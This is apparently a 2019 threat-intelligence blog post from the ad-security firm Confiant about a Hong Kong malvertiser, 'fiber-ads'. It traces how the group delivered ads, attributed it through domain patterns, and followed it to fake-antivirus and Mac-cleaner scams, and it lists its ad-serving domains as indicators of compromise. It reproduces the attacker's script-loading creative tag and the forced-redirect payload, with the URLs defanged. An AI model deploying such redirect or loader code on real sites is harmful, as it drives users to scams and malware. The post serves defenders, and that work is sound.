Hong Kong Based Malvertiser Brokers Traffic To Fake Antivirus Scams — Over 100 Million Ads Compromised In 2019 So Far

Eliya Stein
Confiant
Jul 17, 2019

This blog post explores the techniques and tactics of a persistent malvertiser that operates under a company called “fiber-ads”. We provide an overview of the metrics behind their current and historic activity, a glimpse into their infrastructure, and some details around the impact from exposure to their campaigns.

A History Of High Profile Activity

In the last several months, there have been reports circulating on social media and tech news outlets around malvertisements surfacing through Windows 10 desktop applications. The first details around this activity were published by French security researcher and blogger Malekal:

https://twitter.com/malekal_morte/status/1120805169023860736

Shortly after, the story was covered by Bleeping Computer:

https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/

While these incidents are somewhat unique in that they are spawned outside of the confines of a web browser, in-app advertisements are not the only delivery vehicle for this particular attacker. In fact, this application-based activity is likely just spillover from this bad actor’s already active and disruptive malvertising rampage.

Our goal is to augment the knowledge that has already been shared with the data that we have available from tracking and blocking this attacker on behalf of our publisher and platform clients.

Tactics, Techniques, & Procedures

This attacker has been seen on multiple platforms and exchanges. When this attacker first started getting notice from researchers and the media, the entry point was often the following domain:

ads.creative-serving.com

This is the ad serving domain for Platform161, which in this case is acting as the DSP (realtime ad buying platform).

Note: Platform161 is a victim here and not the perpetrator. We’ve since worked with them to identify and shut off the buyer. (More on that buyer later.)

The creatives are served with little to no variation besides the intermediate ad serving domains that the attackers churn through. The attacker’s creative tag does nothing more than load a script and what looks like an SSP pixel:

document.writeln("<script type=\"text\/javascript\" src=\"hxxps:\/\/www.yukongoldinfo.com\/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]\"><\/script>");
document.writeln("<img src=\"hxxps:\/\/redacted\/sync?dsp_id=4&amp;user_id=0285678c-12f2-4077-9988-48e816b3cb04&amp;ssp=&amp;expires=6&amp;user_group=4&amp;cb=440\" alt=\" \" style=\"display:none\"\/>");

The final script:

!function(t) {
    function e(r) {
        if (n[r])
            return n[r].exports;
        var a = n[r] = {
            exports: {},
            id: r,
            loaded: !1
        };
        return t[r].call(a.exports, a, a.exports, e),
        a.loaded = !0,
        a.exports
    }
    var n = {};
    return e.m = t,
    e.c = n,
    e.p = "/min/",
    e(0)
}([function(t, e) {
    function n() {
        return document.getElementsByTagName("script")
    }
    function r() {
        var t = document.createElement("div");
        return t.innerHTML = "<a target='_blank' href='hxxps://www.redacted.com/form/signup/freetrial-elf-v2/?d=70130000000EqoP'><img src='hxxps://www.yukongoldinfo.com/uploads/pictures/ab454.jpg' style=\"border:none;\" /> </a>",
        t
    }
    var a = n()
      , o = a[a.length - 1]
      , c = r();
    o.parentNode.appendChild(c)
}
]);

Of course this is a subterfuge, served only to those impressions that don’t pass the targeting criteria as determined by the bad actor’s ad serving domain(s). The code is designed to look like ad tech, but does nothing more than render a fake creative.

In the event the attacker decides to spawn an actual redirect, the user will have an experience much like the one outlined in the original Malekal report:

https://www.malekal.com/malvertising-sur-microsoft-menant-a-des-arnaques/

The evil payload is an all too familiar redirect:

top.location.href="hxxps://chanelets-aurning.com/a54334ea-7651-49b6-aa60-3b66ab1afbd3?dom=redacted&ub=adnexus";

Refresher - Malvertisers rely on forced redirections in order to drive victims to phishing pages, tech support scams, or drive-by downloads. The redirections spawn without any user interaction.

The Attribution Model

Large scale malvertisers tend to leverage at least some automation in their infrastructure deployments as they need to pivot often in order to maintain persistence. These folks are no different.

Let’s take a closer look at their ad serving endpoint(s):

hxxps://www.yukongoldinfo.com/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]

Fortunately, the automation chosen here provides an extremely reliable attribution formula: the first three letters of the domain name become the name of the ad serving PHP script (yukongoldinfo.com serves yuk.php), and that script is consistently passed the `pic` parameter alongside the other parameters shown above.

Given this pattern, we are easily able to track this attacker’s historic and future behavior. In 2019 alone, we have so far seen them churn through over 50 domains, all of which are registered at Namecheap. The complete list is available in Appendix A.

Malvertising activity that fits this MO can be traced back to over 100 additional domains going all the way back to 2017.

New ad serving domains from this malvertiser continue to surface on a weekly basis on varying platforms.

The Business Model

In March 2019, we were fortunate to receive some feedback from one of our platform customers regarding a campaign that fit the attribution model for this attacker. We were told that the buyer, “fiber-ads”, has been active as of January 2019.

We were able to confirm this exact buyer with multiple platform partners as well. We were also told that they recently pivoted to a new corporate identity, “Clickfollow”.

Both companies are based out of Hong Kong:

clickfollow.com
fiber-ads.com

Further research into fiber-ads reveals a fascinating glimpse into the malvertiser business model via their profile and behavior on MyMediAds.com — a social network-cum-marketplace for media buyers.

mymediads.com

The fiber-ads profile on MyMediAds reveals an active participant in a gray market where advertisers can transact or form joint ventures with hawkers of cheap inventory that has very questionable provenance.

fiber-ads listings on MyMediAds

While the two screenshots below are not specific to campaigns attributed to fiber-ads, they are great examples of landing pages for the types of “Sweepstakes” and “Mobile” offers usually leveraged by malvertisers to further affiliate fraud.

Here’s a typical listing by fiber-ads that garnered many eager offers from enterprises that are most likely botnet operators or brokers of poor quality traffic:

Here are additional examples that show how fiber-ads position themselves as a middleman in questionable supply-side and demand-side practices:

DSP relationships like these allow fiber-ads to access real inventory that is ripe for malvertising and arbitrage.
Perhaps the pop-ups they’re selling are the forced mobile redirections we have seen?
Postings like this on marketing forums are characteristic of affiliate fraud.

Measuring The Impact

When visualized, campaign volumes associated with this attribution model paint a picture of a very active and persistent malvertiser. The two peaks below are approximately 28MM and 14.5MM impressions respectively with over 100MM impressions served this year as of mid June.

Impressions blocked by Confiant per day in 2019.

Desktop and mobile devices are targeted in relatively equal quantities, but desktop Windows and iOS are heavily favored by the attacker:

Payload Analysis

So how do these campaigns actually play out in the wild? Unfortunately there’s no consistent formula given the “middleman” positioning that fiber-ads has chosen in this gray market.

On one hand, it’s clear that these folks specialize in forming relationships with legitimate DSPs. This gives them access to premium audiences. From there, it’s unclear how much of the campaigns that they run are actually theirs or those of their partners/customers.

The takeaway from this is that once an impression is compromised and the browser is redirected, anything is possible. The best case scenario is a gift card or cell phone giveaway scam, but there is plenty of evidence pointing to a network of landing pages that carry much higher risk — either tech support scams or fake anti-virus downloads.

Back in May and June there were several well documented incidents that bear attribution markers with this wave of campaigns. Taha Karim of our security team provides the payload insights below:

https://answers.microsoft.com/en-us/windows/forum/all/malvertising-attack-on-microsoft-games/ced7ab87-7e0e-422b-97b7-fbfaed2b68a0

The VirusTotal sample is a good starting point for a deeper investigation into the actual malware that’s being proliferated through these campaigns:

https://www.virustotal.com/gui/file/a9351e522ac3d86324dfb455617bfa01da737d1b93fe0f16ba5e614e0e904c56/detection

Most malware installers of this nature are designed to siphon as much revenue as possible from a compromised machine. Usually this takes the form of software that orchestrates further ad fraud, targets the victim directly, or both.

We took a closer look at ReImageRepair, which is a known scam software that falls into the latter category. The installer itself, though suspicious, does not appear to take any direct malicious action on the infected host. Rather, it exploits fear much the same way a tech support scam would:

After the installer is run and installs ReImageRepair.exe, ReImageRepair will start “scanning” the system.
When the scan finishes, it asks the user for a license key to start “repair” of the computer. If the victim provides payment, a version of Avira Antivirus is installed on the machine and beacons back to the ReImage CDN servers.

The payload above is at least 6 weeks old — but what does it look like today? Unfortunately, and to no one’s surprise, the malvertisements persist, but the flavor of the payload is always evolving. The same endpoint we analyzed that drops the malware served by fiber-ads again looks towards phishing and fear tactics to drive installs:

Malware downloader hosted on www.apple.com-shield[.]live
The call to action spawns a malware download.
The victim is now compromised by today’s malware flavor of the week — https://www.virustotal.com/gui/file/ce4b67ef7edf6560ccfb1c4f497c608860378abfe047087dbec248350922d091/detection

These “mac cleaning” apps have been seen circulating since 2017, delivered through “Mughthesec” macOS malware:

https://objective-see.com/blog/blog_0x20.html

http://cleanup-mymac.com/

Final Thought

Generally, malvertisers fall into one of two categories. There are those that own the entire delivery chain, including the monetization after a victim is infected. Then there are those like fiber-ads who act as intermediaries. Both are equally disruptive — but the latter introduce an additional layer of complexity when it comes to attribution.

The middle-men provide the delivery mechanism, but from there the trail can get murky very quickly as the ultimate payload probably goes to the highest bidder, or to whomever the malvertiser is partnered with at that particular moment.

As a parting thought, we would like to suggest that ad tech platforms take extra care to vet their advertisers — and if something smells a bit fishy, like a buyer incorporated in a dodgy jurisdiction, it might be prudent to bypass that business opportunity altogether.

Appendix A — Indicators Of Compromise

Ad serving domains used by fiber-ads in 2019:

*.ticktockhealth.com
*.hugexdeal.com
*.happylifebab.com
*.upcum.com
*.hilltopgo.com
*.manorparty.com
*.oddheels.com
*.topgreatxoffers.com
*.naughtyxparty.com
*.softxbutt.com
*.gunnersalmighty.com
*.amazingfunnvideos.com
*.libreriamedina.com
*.robovoiz.com
*.travelstool.com
*.gladiatorbugs.com
*.clubpenguinclub.com
*.pennyotcstock.com
*.taodropship.com
*.wallpapersfacts.com
*.menuexamples.com
*.adminpromotion.com
*.commercedirections.com
*.wholesomehealthshop.com
*.trafficshirts.com
*.studiolineworks.com
*.safeonlinesites.com
*.thegreenzoneblog.com
*.salemyticket.com
*.trackmackweldon.com
*.adsalesforce.com
*.effectivelyreport.com
*.greenmentioned.com
*.recentphenomenon.com
*.requestingreview.com
*.includeinthebox.com
*.showgardener.com
*.romeoforum.com
*.automationeventually.com
*.yukongoldinfo.com
*.jasonsvid.com
*.blissfulonline.com
*.capsuledaily.com
*.clickercollections.com
*.wonderfulproductives.com
*.scaryheels.com
*.magararepublic.com
*.factorcontest.com
*.dialgold.com
*.justmarriedvideo.com
*.myaarzoo.com
*.gangidance.com
*.tacchisexy.com

Thanks

  • Malekal for providing the original client-side payload. (Twitter: @malekal_morte)

Technology, Security, and Blockchain Enthusiast. Security Engineering & Research @ Confiant.